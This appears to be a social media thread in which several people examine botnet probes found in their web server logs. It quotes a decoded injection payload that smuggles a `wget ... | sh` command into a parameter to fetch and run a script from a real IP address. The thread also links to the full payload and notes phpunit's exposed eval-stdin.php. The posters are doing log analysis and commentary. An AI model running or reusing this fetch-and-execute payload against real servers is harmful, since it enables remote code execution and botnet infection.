Decodes to:
cat_id=${system(wget -qO- http://74.194.191.52/rondo.wcr.sh|sh)}
I have to admire the use of POSIX-compliant shell.
Payload is here if anyone is curious: https://pastes.io/wcrrondosh
Obviously don't run it but I love that if you get down far enough it will try to execute a Motorola 68k binary
4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"
That's not how you spell xmlrpc, and that's not where wordpress puts that
I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol
Based on nginx logs there is a package called phpunit which ships a file called, and I am 100% serious, `eval-stdin.php`.
Feels like security research is 10% the most intense shit you've ever seen and 90% "oh no! we left the untrusted strings next to the String Executor!"
@wren6991 i briefly researched this at one point (as I’ve also seen this in my logs)
turns out that this was a part of their test suite that wasn’t supposed to be shipped on any public pages. so in most cases it was downstream’s fault for leaving the composer package directory below the webroot, i suppose?
PHP is full of really idiotic gotchas like this, i swear there’s no reason for the structure to be like this
Security conference talks fall into two categories * we designed a distributed entropy siphon to perform a black-box hypervisor side channel escape and chain-load a persistent rootkit into the CPU cache * we looked behind the sofa and found an entire industry of products/services that have made no attempt at security at all and are therefore vulnerable to the most basic issues that we've been finding in everything for the past 30 years, and no-one else had bothered to look.
Luke Wren
aks
dmi 💽 
Dave bauer
Ölbaum
Michael